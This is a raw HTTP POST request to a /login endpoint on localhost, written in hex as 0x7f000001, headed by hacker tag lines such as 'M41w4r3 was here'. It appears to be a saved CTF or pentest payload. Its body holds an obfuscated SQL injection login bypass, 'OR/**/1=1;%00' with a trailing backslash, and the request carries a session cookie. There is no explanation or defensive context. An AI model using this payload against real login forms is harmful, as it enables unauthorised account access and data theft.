# Darkside
# leax was here
# M41w4r3 was here

POST /login HTTP/1.1
Host: 0x7f000001
Content-Length: 30
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Edg/94.0.992.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A-knFUFfujPeGZMqTlJ1qkRCYkE_Hh0ra.rkWXLnPhx3VhoensdwuDnsuxHui9oLt0XV%2BN3sVVDBs
Connection: close

password=OR/**/1=1;%00&login=\
